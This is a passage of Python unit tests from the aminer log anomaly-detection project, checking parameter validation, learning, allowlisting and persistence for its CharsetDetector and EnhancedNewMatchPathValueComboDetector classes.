        types are TypeErrors).
        """
        self.assertRaises(TypeError, CharsetDetector, self.aminer_config, ["default"], ["/model/id"], ["/model/value"])
        self.assertRaises(TypeError, CharsetDetector, self.aminer_config, None, ["/model/id"], ["/model/value"])
        self.assertRaises(TypeError, CharsetDetector, self.aminer_config, "", ["/model/id"], ["/model/value"])
        self.assertRaises(TypeError, CharsetDetector, self.aminer_config, b"Default", ["/model/id"], ["/model/value"])
        self.assertRaises(TypeError, CharsetDetector, self.aminer_config, True, ["/model/id"], ["/model/value"])
        self.assertRaises(TypeError, CharsetDetector, self.aminer_config, 123, ["/model/id"], ["/model/value"])
        self.assertRaises(TypeError, CharsetDetector, self.aminer_config, 123.3, ["/model/id"], ["/model/value"])
        self.assertRaises(TypeError, CharsetDetector, self.aminer_config, {"id": "Default"}, ["/model/id"], ["/model/value"])
        self.assertRaises(TypeError, CharsetDetector, self.aminer_config, (), ["/model/id"], ["/model/value"])
        self.assertRaises(TypeError, CharsetDetector, self.aminer_config, set(), ["/model/id"], ["/model/value"])
        self.assertRaises(ValueError, CharsetDetector, self.aminer_config, [self.stream_printer_event_handler],
[""], ["/model/value"]) self.assertRaises(TypeError, CharsetDetector, self.aminer_config, [self.stream_printer_event_handler], "", ["/model/value"]) self.assertRaises(TypeError, CharsetDetector, self.aminer_config, [self.stream_printer_event_handler], b"Default", ["/model/value"]) self.assertRaises(TypeError, CharsetDetector, self.aminer_config, [self.stream_printer_event_handler], True, ["/model/value"]) self.assertRaises(TypeError, CharsetDetector, self.aminer_config, [self.stream_printer_event_handler], 123, ["/model/value"]) self.assertRaises(TypeError, CharsetDetector, self.aminer_config, [self.stream_printer_event_handler], 123.3, ["/model/value"]) self.assertRaises(TypeError, CharsetDetector, self.aminer_config, [self.stream_printer_event_handler], {"id": "Default"}, ["/model/value"]) self.assertRaises(TypeError, CharsetDetector, self.aminer_config, [self.stream_printer_event_handler], (), ["/model/value"]) self.assertRaises(TypeError, CharsetDetector, self.aminer_config, [self.stream_printer_event_handler], set(), ["/model/value"]) self.assertRaises(ValueError, CharsetDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/id"], [""]) self.assertRaises(TypeError, CharsetDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/id"], "") self.assertRaises(TypeError, CharsetDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/id"], b"Default") self.assertRaises(TypeError, CharsetDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/id"], True) self.assertRaises(TypeError, CharsetDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/id"], 123) self.assertRaises(TypeError, CharsetDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/id"], 123.3) self.assertRaises(TypeError, CharsetDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/id"], {"id": "Default"}) self.assertRaises(TypeError, CharsetDetector, 
self.aminer_config, [self.stream_printer_event_handler], ["/model/id"], ()) self.assertRaises(TypeError, CharsetDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/id"], set()) self.assertRaises(ValueError, CharsetDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/id"], ["/model/value"], persistence_id="") self.assertRaises(TypeError, CharsetDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/id"], ["/model/value"], persistence_id=None) self.assertRaises(TypeError, CharsetDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/id"], ["/model/value"], persistence_id=b"Default") self.assertRaises(TypeError, CharsetDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/id"], ["/model/value"], persistence_id=True) self.assertRaises(TypeError, CharsetDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/id"], ["/model/value"], persistence_id=123) self.assertRaises(TypeError, CharsetDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/id"], ["/model/value"], persistence_id=123.22) self.assertRaises(TypeError, CharsetDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/id"], ["/model/value"], persistence_id={"id": "Default"}) self.assertRaises(TypeError, CharsetDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/id"], ["/model/value"], persistence_id=["Default"]) self.assertRaises(TypeError, CharsetDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/id"], ["/model/value"], persistence_id=[]) self.assertRaises(TypeError, CharsetDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/id"], ["/model/value"], persistence_id=()) self.assertRaises(TypeError, CharsetDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/id"], ["/model/value"], persistence_id=set()) CharsetDetector(self.aminer_config, 
[self.stream_printer_event_handler], ["/model/id"], ["/model/value"], persistence_id="Default") self.assertRaises(TypeError, CharsetDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/id"], ["/model/value"], learn_mode=b"True") self.assertRaises(TypeError, CharsetDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/id"], ["/model/value"], learn_mode="True") self.assertRaises(TypeError, CharsetDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/id"], ["/model/value"], learn_mode=123) self.assertRaises(TypeError, CharsetDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/id"], ["/model/value"], learn_mode=123.22) self.assertRaises(TypeError, CharsetDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/id"], ["/model/value"], learn_mode={"id": "Default"}) self.assertRaises(TypeError, CharsetDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/id"], ["/model/value"], learn_mode=["Default"]) self.assertRaises(TypeError, CharsetDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/id"], ["/model/value"], learn_mode=[]) self.assertRaises(TypeError, CharsetDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/id"], ["/model/value"], learn_mode=()) self.assertRaises(TypeError, CharsetDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/id"], ["/model/value"], learn_mode=set()) CharsetDetector(self.aminer_config, [self.stream_printer_event_handler], ["/model/id"], ["/model/value"], learn_mode=True) self.assertRaises(TypeError, CharsetDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/id"], ["/model/value"], output_logline=None) self.assertRaises(TypeError, CharsetDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/id"], ["/model/value"], output_logline=b"True") self.assertRaises(TypeError, CharsetDetector, 
self.aminer_config, [self.stream_printer_event_handler], ["/model/id"], ["/model/value"], output_logline="True") self.assertRaises(TypeError, CharsetDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/id"], ["/model/value"], output_logline=123) self.assertRaises(TypeError, CharsetDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/id"], ["/model/value"], output_logline=123.22) self.assertRaises(TypeError, CharsetDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/id"], ["/model/value"], output_logline={"id": "Default"}) self.assertRaises(TypeError, CharsetDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/id"], ["/model/value"], output_logline=["Default"]) self.assertRaises(TypeError, CharsetDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/id"], ["/model/value"], output_logline=[]) self.assertRaises(TypeError, CharsetDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/id"], ["/model/value"], output_logline=()) self.assertRaises(TypeError, CharsetDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/id"], ["/model/value"], output_logline=set()) CharsetDetector(self.aminer_config, [self.stream_printer_event_handler], ["/model/id"], ["/model/value"], output_logline=True) self.assertRaises(ValueError, CharsetDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/id"], ["/model/value"], ignore_list=[""]) self.assertRaises(TypeError, CharsetDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/id"], ["/model/value"], ignore_list="") self.assertRaises(TypeError, CharsetDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/id"], ["/model/value"], ignore_list=b"Default") self.assertRaises(TypeError, CharsetDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/id"], ["/model/value"], ignore_list=True) 
self.assertRaises(TypeError, CharsetDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/id"], ["/model/value"], ignore_list=123) self.assertRaises(TypeError, CharsetDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/id"], ["/model/value"], ignore_list=123.3) self.assertRaises(TypeError, CharsetDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/id"], ["/model/value"], ignore_list={"id": "Default"}) self.assertRaises(TypeError, CharsetDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/id"], ["/model/value"], ignore_list=()) self.assertRaises(TypeError, CharsetDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/id"], ["/model/value"], ignore_list=set()) CharsetDetector(self.aminer_config, [self.stream_printer_event_handler], ["/model/id"], ["/model/value"], ignore_list=[]) CharsetDetector(self.aminer_config, [self.stream_printer_event_handler], ["/model/id"], ["/model/value"], ignore_list=None) self.assertRaises(ValueError, CharsetDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/id"], ["/model/value"], constraint_list=[""]) self.assertRaises(TypeError, CharsetDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/id"], ["/model/value"], constraint_list="") self.assertRaises(TypeError, CharsetDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/id"], ["/model/value"], constraint_list=b"Default") self.assertRaises(TypeError, CharsetDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/id"], ["/model/value"], constraint_list=True) self.assertRaises(TypeError, CharsetDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/id"], ["/model/value"], constraint_list=123) self.assertRaises(TypeError, CharsetDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/id"], ["/model/value"], constraint_list=123.3) 
self.assertRaises(TypeError, CharsetDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/id"], ["/model/value"], constraint_list={"id": "Default"}) self.assertRaises(TypeError, CharsetDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/id"], ["/model/value"], constraint_list=()) self.assertRaises(TypeError, CharsetDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/id"], ["/model/value"], constraint_list=set()) CharsetDetector(self.aminer_config, [self.stream_printer_event_handler], ["/model/id"], ["/model/value"], constraint_list=[]) CharsetDetector(self.aminer_config, [self.stream_printer_event_handler], ["/model/id"], ["/model/value"], constraint_list=None) self.assertRaises(ValueError, CharsetDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/id"], ["/model/value"], learn_mode=True, stop_learning_time=-1) self.assertRaises(ValueError, CharsetDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/id"], ["/model/value"], learn_mode=True, stop_learning_time=0) self.assertRaises(TypeError, CharsetDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/id"], ["/model/value"], learn_mode=True, stop_learning_time=b"Default") self.assertRaises(TypeError, CharsetDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/id"], ["/model/value"], learn_mode=True, stop_learning_time="123") self.assertRaises(TypeError, CharsetDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/id"], ["/model/value"], learn_mode=True, stop_learning_time={"id": "Default"}) self.assertRaises(TypeError, CharsetDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/id"], ["/model/value"], learn_mode=True, stop_learning_time=["Default"]) self.assertRaises(TypeError, CharsetDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/id"], ["/model/value"], learn_mode=True, 
stop_learning_time=[]) self.assertRaises(TypeError, CharsetDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/id"], ["/model/value"], learn_mode=True, stop_learning_time=()) self.assertRaises(TypeError, CharsetDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/id"], ["/model/value"], learn_mode=True, stop_learning_time=set()) CharsetDetector(self.aminer_config, [self.stream_printer_event_handler], ["/model/id"], ["/model/value"], learn_mode=True, stop_learning_time=100) CharsetDetector(self.aminer_config, [self.stream_printer_event_handler], ["/model/id"], ["/model/value"], learn_mode=True, stop_learning_time=100.22) self.assertRaises(ValueError, CharsetDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/id"], ["/model/value"], learn_mode=True, stop_learning_no_anomaly_time=-1) self.assertRaises(ValueError, CharsetDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/id"], ["/model/value"], learn_mode=True, stop_learning_no_anomaly_time=0) self.assertRaises(TypeError, CharsetDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/id"], ["/model/value"], learn_mode=True, stop_learning_no_anomaly_time=b"Default") self.assertRaises(TypeError, CharsetDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/id"], ["/model/value"], learn_mode=True, stop_learning_no_anomaly_time="123") self.assertRaises(TypeError, CharsetDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/id"], ["/model/value"], learn_mode=True, stop_learning_no_anomaly_time={"id": "Default"}) self.assertRaises(TypeError, CharsetDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/id"], ["/model/value"], learn_mode=True, stop_learning_no_anomaly_time=["Default"]) self.assertRaises(TypeError, CharsetDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/id"], ["/model/value"], learn_mode=True, 
stop_learning_no_anomaly_time=[]) self.assertRaises(TypeError, CharsetDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/id"], ["/model/value"], learn_mode=True, stop_learning_no_anomaly_time=()) self.assertRaises(TypeError, CharsetDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/id"], ["/model/value"], learn_mode=True, stop_learning_no_anomaly_time=set()) CharsetDetector(self.aminer_config, [self.stream_printer_event_handler], ["/model/id"], ["/model/value"], learn_mode=True, stop_learning_no_anomaly_time=100) CharsetDetector(self.aminer_config, [self.stream_printer_event_handler], ["/model/id"], ["/model/value"], learn_mode=True, stop_learning_no_anomaly_time=100.22) self.assertRaises(ValueError, CharsetDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/id"], ["/model/value"], learn_mode=True, stop_learning_time=100, stop_learning_no_anomaly_time=100) self.assertRaises(ValueError, CharsetDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/id"], ["/model/value"], log_resource_ignore_list=["/tmp/syslog"]) self.assertRaises(TypeError, CharsetDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/id"], ["/model/value"], log_resource_ignore_list="") self.assertRaises(TypeError, CharsetDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/id"], ["/model/value"], log_resource_ignore_list=b"Default") self.assertRaises(TypeError, CharsetDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/id"], ["/model/value"], log_resource_ignore_list=True) self.assertRaises(TypeError, CharsetDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/id"], ["/model/value"], log_resource_ignore_list=123) self.assertRaises(TypeError, CharsetDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/id"], ["/model/value"], log_resource_ignore_list=123.22) self.assertRaises(TypeError, 
CharsetDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/id"], ["/model/value"], log_resource_ignore_list={"id": "Default"}) self.assertRaises(TypeError, CharsetDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/id"], ["/model/value"], log_resource_ignore_list=()) self.assertRaises(TypeError, CharsetDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/id"], ["/model/value"], log_resource_ignore_list=set()) CharsetDetector(self.aminer_config, [self.stream_printer_event_handler], ["/model/id"], ["/model/value"], log_resource_ignore_list=["file:///tmp/syslog"]) if __name__ == "__main__": unittest.main() EnhancedNewMatchPathValueComboDetectorTest.py000066400000000000000000000660711500476301700343700ustar00rootroot00000000000000logdata-anomaly-miner-2.8.0/aecid-testsuite/unit/analysisimport unittest from aminer.parsing.ParserMatch import ParserMatch from aminer.input.LogAtom import LogAtom from aminer.analysis.EnhancedNewMatchPathValueComboDetector import EnhancedNewMatchPathValueComboDetector import time from unit.TestBase import TestBase, DummyMatchContext, DummyFixedDataModelElement, DummySequenceModelElement from datetime import datetime from aminer.AminerConfig import DEFAULT_PERSISTENCE_PERIOD class EnhancedNewMatchPathValueComboDetectorTest(TestBase): """Unittests for the EnhancedNewMatchPathValueComboDetector.""" match_context = DummyMatchContext(b" pid=25537 uid=2") fdme1 = DummyFixedDataModelElement("s1", b" pid=") fdme2 = DummyFixedDataModelElement("d1", b"25537") seq1 = DummySequenceModelElement("seq", [fdme1, fdme2]) match_element1 = seq1.get_match_element("", match_context) match_context = DummyMatchContext(b"ddd 25538ddd ") fdme3 = DummyFixedDataModelElement("s1", b"ddd ") fdme4 = DummyFixedDataModelElement("d1", b"25538") seq2 = DummySequenceModelElement("seq", [fdme3, fdme4]) match_element2 = seq2.get_match_element("", match_context) match_element3 = 
fdme3.get_match_element("/seq", match_context)

def test1receive_atom(self):
    """
    Test if log atoms are processed correctly and the detector is learning (learn_mode=True) and stops if learn_mode=False.
    Test if stop_learning_time and stop_learning_no_anomaly_timestamp are implemented properly.
    """
    expected_string = '%s New value combination(s) detected\n%s: "None" (%d lines)\n %s\n\n'
    datetime_format_string = "%Y-%m-%d %H:%M:%S"
    enmpvcd = EnhancedNewMatchPathValueComboDetector(self.aminer_config, ["/seq/s1", "/seq/d1"], [self.stream_printer_event_handler],
                                                      learn_mode=True, output_logline=False)

    def expected_output(stamp, known_values):
        """Build the report the detector is expected to print for a single new combination at time stamp."""
        return expected_string % (datetime.fromtimestamp(stamp).strftime(datetime_format_string), enmpvcd.__class__.__name__, 1,
                                  known_values)

    t = round(time.time(), 3)
    log_atom1 = LogAtom(self.match_element1.match_string, ParserMatch(self.match_element1), t, enmpvcd)
    log_atom2 = LogAtom(self.match_element2.match_string, ParserMatch(self.match_element2), t, enmpvcd)
    log_atom3 = LogAtom(self.match_element3.match_string, ParserMatch(self.match_element3), t, enmpvcd)

    # learn_mode = True: the first occurrence of a combination is reported and learned.
    self.assertTrue(enmpvcd.receive_atom(log_atom1))
    self.assertEqual(self.output_stream.getvalue(), expected_output(t, f"{{(b' pid=', b'25537'): [{t}, {t}, 1]}}"))
    self.reset_output_stream()
    # A known combination produces no further output.
    self.assertTrue(enmpvcd.receive_atom(log_atom1))
    self.assertEqual(self.output_stream.getvalue(), "")
    self.reset_output_stream()

    # learn_mode = False: unknown combinations are still reported on every occurrence.
    enmpvcd.learn_mode = False
    self.assertTrue(enmpvcd.receive_atom(log_atom2))
    self.assertEqual(self.output_stream.getvalue(),
                     expected_output(t, f"{{(b' pid=', b'25537'): [{t}, {t}, 2], (b'ddd ', b'25538'): [{t}, {t}, 1]}}"))
    self.reset_output_stream()
    # Repeating reports again, with the last-seen time and the counter updated.
    log_atom2.atom_time += 100
    self.assertTrue(enmpvcd.receive_atom(log_atom2))
    self.assertEqual(self.output_stream.getvalue(),
                     expected_output(t + 100, f"{{(b' pid=', b'25537'): [{t}, {t}, 2], (b'ddd ', b'25538'): [{t}, {t+100}, 2]}}"))
    self.reset_output_stream()

    # allow_missing_values_flag = True: a combination with a missing path is reported with None in its place.
    enmpvcd.allow_missing_values_flag = True
    self.assertTrue(enmpvcd.receive_atom(log_atom3))
    self.assertEqual(self.output_stream.getvalue(), expected_output(
        t, f"{{(b' pid=', b'25537'): [{t}, {t}, 2], (b'ddd ', b'25538'): [{t}, {t+100}, 2], (b'ddd ', None): [{t}, {t}, 1]}}"))

    # stop_learning_time: learning stops once an atom is more than 100 seconds after the first one.
    enmpvcd = EnhancedNewMatchPathValueComboDetector(self.aminer_config, ["/seq/s1", "/seq/d1"], [self.stream_printer_event_handler],
                                                      learn_mode=True, output_logline=False, stop_learning_time=100)
    self.assertTrue(enmpvcd.receive_atom(log_atom1))
    log_atom1.atom_time = t + 99
    self.assertTrue(enmpvcd.receive_atom(log_atom1))
    self.assertTrue(enmpvcd.learn_mode)
    log_atom1.atom_time = t + 101
    self.assertTrue(enmpvcd.receive_atom(log_atom1))
    self.assertFalse(enmpvcd.learn_mode)

    # stop_learning_no_anomaly_time: the deadline is pushed forward by every new combination (log_atom2 at t + 100).
    enmpvcd = EnhancedNewMatchPathValueComboDetector(self.aminer_config, ["/seq/s1", "/seq/d1"], [self.stream_printer_event_handler],
                                                      learn_mode=True, output_logline=False, stop_learning_no_anomaly_time=100)
    for atom, stamp, still_learning in ((log_atom1, t, True), (log_atom1, t + 100, True), (log_atom2, t + 100, True),
                                        (log_atom1, t + 200, True), (log_atom1, t + 201, False)):
        atom.atom_time = stamp
        self.assertTrue(enmpvcd.receive_atom(atom))
        self.assertEqual(enmpvcd.learn_mode, still_learning)

def test2do_timer(self):
    """Test if the do_timer method is implemented properly."""
    enmpvcd = EnhancedNewMatchPathValueComboDetector(self.aminer_config, ["path"], [self.stream_printer_event_handler], learn_mode=True,
                                                      output_logline=False)
    t = time.time()
    enmpvcd.next_persist_time = t + 400
    # Before the persist time the remaining delay is returned; reaching it persists and schedules a full period again.
    for delta, expected_delay in ((200, 200), (400, DEFAULT_PERSISTENCE_PERIOD), (999, 1), (1000, DEFAULT_PERSISTENCE_PERIOD)):
        self.assertEqual(enmpvcd.do_timer(t + delta), expected_delay)

def test3allowlist_event(self):
    """Test if the allowlist_event method is implemented properly."""
    enmpvcd = EnhancedNewMatchPathValueComboDetector(self.aminer_config, ["/seq/s1", "/seq/d1"], [self.stream_printer_event_handler],
                                                      learn_mode=True, output_logline=False)
    own_event = "Analysis.%s" % enmpvcd.__class__.__name__
    t = round(time.time(), 3)
    value = b"value"
    value2 = b"value2"
    log_atom1 = LogAtom(self.match_element1.match_string, ParserMatch(self.match_element1), t, enmpvcd)
    enmpvcd.receive_atom(log_atom1)
    # An event type that belongs to a different detector class must be rejected.
    self.assertRaises(Exception, enmpvcd.allowlist_event, "Analysis.NewMatchPathDetector", self.output_stream.getvalue(), None)
    # The EnhancedNewMatchPathValueComboDetector does not accept allowlisting data, so passing some must raise.
    self.assertRaises(Exception, enmpvcd.allowlist_event, own_event, self.output_stream.getvalue(), ["random", "Data"])
    # A (timestamp, value tuple) pair is added to the known values and reported.
    self.assertEqual(enmpvcd.allowlist_event(own_event, (t, (value, value2)), None),
                     "Allowlisted path(s) %s with %s." % ("/seq/s1, /seq/d1", (t, (value, value2))))
    self.assertEqual(enmpvcd.known_values_dict, {(b' pid=', b'25537'): [t, t, 1], (value, value2): [t, t, 1]})
    # A bare value tuple without the timestamp is not an acceptable event data shape.
    self.assertRaises(TypeError, enmpvcd.allowlist_event, own_event, (value, None), None)
    # allow_missing_values_flag = True: None is accepted as a missing value.
    enmpvcd.allow_missing_values_flag = True
    self.assertEqual(enmpvcd.allowlist_event(own_event, (t, (value, None)), None),
                     "Allowlisted path(s) %s with %s." % ("/seq/s1, /seq/d1", (t, (value, None))))
    self.assertEqual(enmpvcd.known_values_dict,
                     {(b" pid=", b"25537"): [t, t, 1], (value, value2): [t, t, 1], (value, None): [t, t, 1]})

def test4persistence(self):
    """Test the do_persist and load_persistence_data methods."""
    enmpvcd = EnhancedNewMatchPathValueComboDetector(self.aminer_config, ["/seq/s1", "/seq/d1"], [self.stream_printer_event_handler],
                                                      learn_mode=True, output_logline=False)
    t = round(time.time(), 3)
    for element in (self.match_element1, self.match_element2):
        self.assertTrue(enmpvcd.receive_atom(LogAtom(element.match_string, ParserMatch(element), t, enmpvcd)))
    learned = {(b' pid=', b'25537'): [t, t, 1], (b"ddd ", b"25538"): [t, t, 1]}
    self.assertEqual(enmpvcd.known_values_dict, learned)
    enmpvcd.do_persist()
    # Bytes values are persisted with a "bytes:" prefix so that their type survives the round trip.
    with open(enmpvcd.persistence_file_name, "r") as f:
        self.assertEqual(f.read(), f'[[["bytes: pid=", "bytes:25537"], [{t}, {t}, 1]], [["bytes:ddd ", "bytes:25538"], [{t}, {t}, 1]]]')
    enmpvcd.known_values_dict = dict()
    enmpvcd.load_persistence_data()
    self.assertEqual(enmpvcd.known_values_dict, learned)
    # A fresh detector with the default persistence id loads the same state.
    other = EnhancedNewMatchPathValueComboDetector(self.aminer_config, [self.match_element1.path, self.match_element2.path],
                                                    [self.stream_printer_event_handler])
    self.assertEqual(enmpvcd.known_values_dict, other.known_values_dict)

def test5validate_parameters(self):
"""Test all initialization parameters for the detector. Input parameters must be validated in the class.""" self.assertRaises(ValueError, EnhancedNewMatchPathValueComboDetector, self.aminer_config, [""], [self.stream_printer_event_handler]) self.assertRaises(ValueError, EnhancedNewMatchPathValueComboDetector, self.aminer_config, [], [self.stream_printer_event_handler]) self.assertRaises(ValueError, EnhancedNewMatchPathValueComboDetector, self.aminer_config, None, [self.stream_printer_event_handler]) self.assertRaises(TypeError, EnhancedNewMatchPathValueComboDetector, self.aminer_config, "", [self.stream_printer_event_handler]) self.assertRaises(TypeError, EnhancedNewMatchPathValueComboDetector, self.aminer_config, b"Default", [self.stream_printer_event_handler]) self.assertRaises(TypeError, EnhancedNewMatchPathValueComboDetector, self.aminer_config, True, [self.stream_printer_event_handler]) self.assertRaises(TypeError, EnhancedNewMatchPathValueComboDetector, self.aminer_config, 123, [self.stream_printer_event_handler]) self.assertRaises(TypeError, EnhancedNewMatchPathValueComboDetector, self.aminer_config, 123.3, [self.stream_printer_event_handler]) self.assertRaises(TypeError, EnhancedNewMatchPathValueComboDetector, self.aminer_config, {"id": "Default"}, [self.stream_printer_event_handler]) self.assertRaises(TypeError, EnhancedNewMatchPathValueComboDetector, self.aminer_config, (), [self.stream_printer_event_handler]) self.assertRaises(TypeError, EnhancedNewMatchPathValueComboDetector, self.aminer_config, set(), [self.stream_printer_event_handler]) self.assertRaises(TypeError, EnhancedNewMatchPathValueComboDetector, self.aminer_config, ["path"], ["default"]) self.assertRaises(TypeError, EnhancedNewMatchPathValueComboDetector, self.aminer_config, ["path"], None) self.assertRaises(TypeError, EnhancedNewMatchPathValueComboDetector, self.aminer_config, ["path"], "") self.assertRaises(TypeError, EnhancedNewMatchPathValueComboDetector, self.aminer_config, ["path"], 
b"Default") self.assertRaises(TypeError, EnhancedNewMatchPathValueComboDetector, self.aminer_config, ["path"], True) self.assertRaises(TypeError, EnhancedNewMatchPathValueComboDetector, self.aminer_config, ["path"], 123) self.assertRaises(TypeError, EnhancedNewMatchPathValueComboDetector, self.aminer_config, ["path"], 123.3) self.assertRaises(TypeError, EnhancedNewMatchPathValueComboDetector, self.aminer_config, ["path"], {"id": "Default"}) self.assertRaises(TypeError, EnhancedNewMatchPathValueComboDetector, self.aminer_config, ["path"], ()) self.assertRaises(TypeError, EnhancedNewMatchPathValueComboDetector, self.aminer_config, ["path"], set()) self.assertRaises(ValueError, EnhancedNewMatchPathValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], persistence_id="") self.assertRaises(TypeError, EnhancedNewMatchPathValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], persistence_id=None) self.assertRaises(TypeError, EnhancedNewMatchPathValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], persistence_id=b"Default") self.assertRaises(TypeError, EnhancedNewMatchPathValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], persistence_id=True) self.assertRaises(TypeError, EnhancedNewMatchPathValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], persistence_id=123) self.assertRaises(TypeError, EnhancedNewMatchPathValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], persistence_id=123.22) self.assertRaises(TypeError, EnhancedNewMatchPathValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], persistence_id={"id": "Default"}) self.assertRaises(TypeError, EnhancedNewMatchPathValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], persistence_id=["Default"]) self.assertRaises(TypeError, 
EnhancedNewMatchPathValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], persistence_id=[]) self.assertRaises(TypeError, EnhancedNewMatchPathValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], persistence_id=()) self.assertRaises(TypeError, EnhancedNewMatchPathValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], persistence_id=set()) EnhancedNewMatchPathValueComboDetector(self.aminer_config, ["path"], [self.stream_printer_event_handler], persistence_id="Default") self.assertRaises(TypeError, EnhancedNewMatchPathValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], allow_missing_values_flag=b"True") self.assertRaises(TypeError, EnhancedNewMatchPathValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], allow_missing_values_flag="True") self.assertRaises(TypeError, EnhancedNewMatchPathValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], allow_missing_values_flag=123) self.assertRaises(TypeError, EnhancedNewMatchPathValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], allow_missing_values_flag=123.22) self.assertRaises(TypeError, EnhancedNewMatchPathValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], allow_missing_values_flag={"id": "Default"}) self.assertRaises(TypeError, EnhancedNewMatchPathValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], allow_missing_values_flag=["Default"]) self.assertRaises(TypeError, EnhancedNewMatchPathValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], allow_missing_values_flag=[]) self.assertRaises(TypeError, EnhancedNewMatchPathValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], allow_missing_values_flag=()) self.assertRaises(TypeError, 
